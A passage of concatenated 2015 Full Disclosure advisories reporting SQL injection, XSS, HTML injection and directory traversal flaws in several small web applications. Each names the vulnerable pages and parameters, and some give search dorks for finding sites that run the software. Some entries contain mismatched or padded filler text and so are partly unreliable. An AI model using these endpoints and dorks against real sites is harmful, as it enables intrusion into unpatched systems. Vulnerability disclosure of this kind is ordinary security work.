"Over the years we have developed business domain knowledge various
business areas. We provide Development Services either on time and material
or turn-key fixed prices basis, depending on the nature of the project.
Application Development Services offered by Gcon Tech Solutions help
streamline business processes, systems and information. Gcon Tech Solutions
has a well-defined and mature application development process, which
comprises the complete System Development Life Cycle (SDLC) from defining
the technology strategy formulation to deploying, production operations and
support. We fulfill our client's requirement firstly from our existing
database of highly skilled professionals or by recruiting the finest
candidates locally. We analyze your business requirements and taking into
account any constraints and preferred development tools, prepare a fixed
price quote. This offers our customers a guaranteed price who have a single
point contact for easy administration. We adopt Rapid Application
Development technique where possible for a speedy delivery of the
Solutions. Salient Features of Gcon Tech Solutions Application Development
Services: (a) Flexible and Customizable. (b) Industry driven best
practices. (c) Knowledgebase and reusable components repository. (d) Ensure
process integration with customers at project initiation"




*(2) Vulnerability Details:*
Gcon Tech Solutions web application has a computer cyber security bug
problem. It can be exploited by SQL Injection attacks. This may allow an
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Gcon Tech Solutions has patched
some of them. CXSECurity is a huge collection of information on data
communications safety. Its main objective is to inform about errors in
various applications. It also publishes suggestions, advisories, solutions
details related to SQL Injection vulnerabilities and cyber intelligence
recommendations.


*(2.1)* The first programming code flaw occurs at "content.php?" page with
"&id" parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/gcon-tech-solutions-v1-0-sql/
http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-sql.html
http://www.diebiyi.com/articles/security/gcon-tech-solutions-v1-0-sql/
https://itswift.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-sql/
http://whitehatpost.blog.163.com/blog/static/242232054201542455422939/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://cxsecurity.com/issue/WLB-2015040036
http://seclists.org/fulldisclosure/2015/May/32
http://lists.openwall.net/full-disclosure/2015/05/08/8
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1955





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

[Jing Wang]

*Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security
Vulnerabilities*


Exploit Title: Gcon Tech Solutions v1.0 content.php? &id Parameter XSS
Security Vulnerabilities
Product: Gcon Tech Solutions
Vendor: Gcon Tech Solutions
Vulnerable Versions: v1.0
Tested Version: v1.0
Advisory Publication: May 23, 2015
Latest Update: May 23, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences, Nanyang Technological University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Gcon Tech Solutions



*Product & Vulnerable Versions:*
Gcon Tech Solutions
v1.0



*Vendor URL & Download:*
Gcon Tech Solutions can be obtained from here,
http://www.gconts.com/Development.htm



*Google Dork:*
"Developed and maintained by Gcon Tech Solutions"



*Product Introduction Overview:*
"Over the years we have developed business domain knowledge various
business areas. We provide Development Services either on time and material
or turn-key fixed prices basis, depending on the nature of the project.
Application Development Services offered by Gcon Tech Solutions help
streamline business processes, systems and information. Gcon Tech Solutions
has a well-defined and mature application development process, which
comprises the complete System Development Life Cycle (SDLC) from defining
the technology strategy formulation to deploying, production operations and
support. We fulfill our client's requirement firstly from our existing
database of highly skilled professionals or by recruiting the finest
candidates locally. We analyze your business requirements and taking into
account any constraints and preferred development tools, prepare a fixed
price quote. This offers our customers a guaranteed price who have a single
point contact for easy administration. We adopt Rapid Application
Development technique where possible for a speedy delivery of the
Solutions. Salient Features of Gcon Tech Solutions Application Development
Services: (a) Flexible and Customizable. (b) Industry driven best
practices. (c) Knowledgebase and reusable components repository. (d) Ensure
process integration with customers at project initiation"




*(2) Vulnerability Details:*
Gcon Tech Solutions web application has a computer cyber security bug
problem. It can be exploited by XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Gcon Tech Solutions has patched
some of them. The Mail Archive automatically detects when it receives mail
from a new list. Thus, you are encouraged, although certainly not required,
to send a test message to the newly archived list. If you are adding
several lists to the archive, send a separate and distinct test message to
each one. It also publishes suggestions, advisories, solutions details
related to XSS vulnerabilities and cyber intelligence recommendations.


*(2.1) *The first programming code flaw occurs at "&id" parameter in
"content.php?" page.








*References:*
http://www.tetraph.com/security/xss-vulnerability/gcon-tech-solutions-v1-0-xss/
http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/gcon-tech-solutions-v1-0-xss/
https://webtechwire.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154245138791/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02028.html
http://seclists.org/fulldisclosure/2015/May/34
https://www.bugscan.net/#!/x/21839
http://lists.openwall.net/full-disclosure/2015/04/05/8
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1957





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities

[Jing Wang]

*Feed2JS v1.7 XSS (Cross-site Scripting) Web Security Vulnerabilities*


Exploit Title: Feed2JS v1.7 magpie_debug.php? &url parameter XSS Security
Vulnerabilities
Product: Feed2JS
Vendor: feed2js.org
Vulnerable Versions: v1.7
Tested Version: v1.7
Advisory Publication: May 09, 2015
Latest Update: May 09, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Jing Wang [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
feed2js.org


*Product & Vulnerable Versions:*
Feed2JS
v1.7


*Vendor URL & Download:*
Feed2JS can be downloaded from here,
https://feed2js.org/index.php?s=download


*Source code:*
http://www.gnu.org/licenses/gpl.html


*Product Introduction Overview:*
"What is "Feed to JavaScript? An RSS Feed is a dynamically generated
summary (in XML format) of information or news published on other web
sites- so when the published RSS changes, your web site will be
automatically changed too. It is a rather simple technology that allows
you, the humble web page designer, to have this content displayed in your
own web page, without having to know a lick about XML! Think of it as a box
you define on your web page that is able to update itself, whenever the
source of the information changes, your web page does too, without you
having to do a single thing to it. This Feed2JS web site (new and
improved!) provides you a free service that can do all the hard work for
you-- in 3 easy steps:
Find the RSS source, the web address for the feed.
Use our simple tool to build the JavaScript command that will display it
Optionally style it up to look pretty.

Please keep in mind that feeds are cached on our site for 60 minutes, so if
you add content to your RSS feed, the updates will take at least an hour to
appear in any other web site using Feed2JS to display that feed. To run
these scripts, you need a web server capable of running PHP which is rather
widely available (and free). You will need to FTP files to your server,
perhaps change permissions, and make some basic edits to configure it for
your system. I give you the code, getting it to work is on your shoulders.
I will try to help, but cannot always promise answers."




*(2) Vulnerability Details:*
Feed2JS web application has a computer security bug problem. It can be
exploited by stored XSS attacks. This may allow a remote attacker to create
a specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several other Feed2JS products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Feed2JS has patched some of them.
"Openwall software releases and other related files are also available from
the Openwall file archive and its mirrors. You are encouraged to use the
mirrors, but be sure to verify the signatures on software you download. The
more experienced users and software developers may use our CVSweb server to
browse through the source code for most pieces of Openwall software along
with revision history information for each source file. We publish
articles, make presentations, and offer professional services." Openwall
has published suggestions, advisories, solutions details related to XSS
vulnerabilities.


*(2.1)* The first programming code flaw occurs at "&url" parameter in
"magpie_debug.php?" page.





*References:*
http://www.tetraph.com/security/xss-vulnerability/feed2js-v1-7-xss/
http://securityrelated.blogspot.com/2015/05/feed2js-v17-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/feed2js-v1-7-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/feed2js-v1-7-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154810359682/
https://progressive-comp.com/?l=full-disclosure&m=142907534026807&w=2
https://www.bugscan.net/#!/x/21291
http://bluereader.org/article/27452996
http://lists.openwall.net/full-disclosure/2015/04/15/4




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities

[Jing Wang]

*MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 "gallery.php?" &category
parameter HTML Injection Security Vulnerabilities
Product: Web-Design v1.12
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing[Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)



*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12


*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
"developed by: Mt. Vernon Media"



*Product Introduction Overview:*
"In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads"




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored HTML Injection attacks. Hypertext Markup Language
(HTML) injection, also sometimes referred to as virtual defacement, is an
attack on a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user supplied
data, an attacker can supply valid HTML, typically via a parameter value,
and inject their own content into the page. This attack is typically used
in conjunction with some form of social engineering, as the attack is
exploiting a code-based vulnerability and a user's trust.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner,
experienced five code refactoring. It has redefined the concept of the
scanner provides sources for the latest info-sec news, tools, and
advisories. It also publishs suggestions, advisories, solutions details
related to HTML vulnerabilities.


*(2.1) *The first programming code flaw occurs at "&category" parameter in
"gallery.php?" page.





*References:*
http://www.tetraph.com/security/html-injection/mt-vernon-media-web-design-v1-12-html-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-html.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-html-injection/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-html-injection/
http://whitehatpost.blog.163.com/blog/static/24223205420154893850881/
https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=2
https://www.bugscan.net/#!/x/21454
http://seclists.org/fulldisclosure/2015/Apr/37
http://lists.openwall.net/full-disclosure/2015/04/15/3




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security Vulnerabilities

[Jing Wang]

*MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection
Security Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore] (@justqdjing)



*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
"developed by: Mt. Vernon Media"



*Product Introduction Overview:*
"In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads"




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored XSS attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. "Openwall software releases and other related files
are also available from the Openwall file archive and its mirrors. You are
encouraged to use the mirrors, but be sure to verify the signatures on
software you download. The more experienced users and software developers
may use our CVSweb server to browse through the source code for most pieces
of Openwall software along with revision history information for each
source file. We publish articles, make presentations, and offer
professional services." Openwall has published suggestions, advisories,
solutions details related to SQL Injection vulnerabilities.


*(2.1) *The first programming code flaw occurs at "section.php?" page with
"&id" parameter.

*(2.2) *The second programming code flaw occurs at "illustrated_verse.php?"
page with "&id" parameter.

*(2.3) *The third programming code flaw occurs at "image.php?" page with
"&id" parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple_8.html
https://progressive-comp.com/?a=139222176300014&r=1&w=1​
http://whitehatpost.blog.163.com/blog/static/242232054201548925221/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44951
https://www.bugscan.net/#!/x/21160
http://bluereader.org/article/27452998

[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities

[Jing Wang]

*MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web
Security Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple XSS Security
Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 07, 2015
Latest Update: May 07, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA



*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
"developed by: Mt. Vernon Media"



*Product Introduction Overview:*
"In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads"




*(2) Vulnerability Details:*
MT.VERNON MEDIA Web-Design web application has a computer security bug
problem. It can be exploited by stored XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner,
experienced five code refactoring. It has redefined the concept of the
scanner provides sources for the latest info-sec news, tools, and
advisories. It also publishs suggestions, advisories, solutions details
related to XSS vulnerabilities.


*(2.1) *The first programming code flaw occurs at "section.php?" page with
"&id" parameter.

*(2.2)* The second programming code flaw occurs at "illustrated_verse.php?"
page with "&id" parameter.

*(2.3)* The third programming code flaw occurs at "image.php?" page with
"&id" parameter.

*(2.4) *The forth programming code flaw occurs at "gallery.php?" page with
"&np" parameter.







*References:*
http://www.tetraph.com/security/xss-vulnerability/mt-vernon-media-web-design-v1-12-multiple-xss/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-multiple-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-multiple-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154885036469
https://progressive-comp.com/?a=139222176300014&r=1&w=1​
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44832
https://www.bugscan.net/#!/x/21289
http://bluereader.org/article/30765596






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.co

[FD] NetCat CMS 3.12 HTML Injection Security Vulnerabilities

[Jing Wang]

*NetCat CMS 3.12 HTML Injection Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML
Injection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 15, 2015
Latest Update: April 15, 2015
Vulnerability Type: Improper Input Validation [CWE-20]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
HTML Injection attacks. Hypertext Markup Language (HTML) injection, also
sometimes referred to as virtual defacement, is an attack on a user made
possible by an injection vulnerability in a web application. When an
application does not properly handle user supplied data, an attacker can
supply valid HTML, typically via a parameter value, and inject their own
content into the page. This attack is typically used in conjunction with
some form of social engineering, as the attack is exploiting a code-based
vulnerability and a user's trust.

Several NetCat products 0-day vulnerabilities have been found by some other
bug hunter researchers before. NetCat has patched some of them. Web
Security Watch is an aggregator of security reports coming from various
sources. It aims to provide a single point of tracking for all publicly
disclosed security issues that matter. "Its unique tagging system enables
you to see a relevant set of tags associated with each security alert for a
quick overview of the affected products. What's more, you can now subscribe
to an RSS feed containing the specific tags that you are interested in -
you will then only receive alerts related to those tags." It has published
suggestions, advisories, solutions details related to HTML vulnerabilities.

*(2.1) *The vulnerability occurs at "catalog/search.php?" page with "&q"
parameter.





*References:*
http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-html-injection-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-html-injection-security-vulnerabilities/
http://www.irist.ir/author-Wang%20Jing.html
http://lists.openwall.net/full-disclosure/2015/03/02/5
http://www.websecuritywatch.com/multiple-http-response-splitting-crlf-xss-vulnerabilities-in-netcat-cms/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities

[Jing Wang]

*NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 Multiple Directory Traversal Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 14, 2015
Latest Update: April 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discovert and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]






*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Vulnerable Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be obtained from here,
http://netcat.ru/


*Product Introduction Overview:*
NetCat.ru is russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."




*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
Directory Traversal - Local File Include (LFI) attacks. A local file
inclusion (LFI) flaw is due to the script not properly sanitizing user
input, specifically path traversal style attacks (e.g. '../../') supplied
to the parameters. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote host . This
may allow disclosing file contents or executing files like PHP scripts.
Such attacks are limited due to the script only calling files already on
the target host.

Several other NetCat products 0-day vulnerabilities have been found by some
other bug hunter researchers before. NetCat has patched some of them. Gmane
(pronounced "mane") is an e-mail to news gateway. It allows users to access
electronic mailing lists as if they were Usenet newsgroups, and also
through a variety of web interfaces. Gmane is an archive; it never expires
messages (unless explicitly requested by users). Gmane also supports
importing list postings made prior to a list's inclusion on the service. It
has published suggestions, advisories, solutions related to Directory
Traversal vulnerabilities.



*(2.1) *The first programming code flaw occurs at "/netcat/index.php?" page
with "&INCLUDE_FOLDER" parameter.
.
*(2.2)* The second programming code flaw occurs at "/eshop/index.php?" page
with "&INCLUDE_FOLDER" parameter.

*(2.3)* The third programming code flaw occurs at "/add.php?" page with
"&INCLUDE_FOLDER" parameter.





References:
http://www.tetraph.com/security/directory-traversal-vulnerability/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-multiple-directory.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://www.iedb.ir/author-Wang%20Jing.html
http://exploitarchive.com/724cms-5-01-4-59-4-01-3-01-directory-traversal/
http://lists.openwall.net/full-disclosure/2015/03/05/5
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1666



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Proverbs Web Calendar 2.1.2 XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*Proverbs Web Calendar 2.1.2 XSS (Cross-site Scripting) Security
Vulnerabilities*


Exploit Title: Proverbs Web Calendar /calendar.php Multiple Parameters XSS
(Cross-site Scripting) Security Vulnerabilities
Vendor: Proverbs
Product: Proverbs Web Calendar
Vulnerable Versions: 1.0.0   1.1   1.2.2   2.1   2.1.2
Tested Version: 1.2.2   2.1
Advisory Publication: April 03, 2015
Latest Update: April 03, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
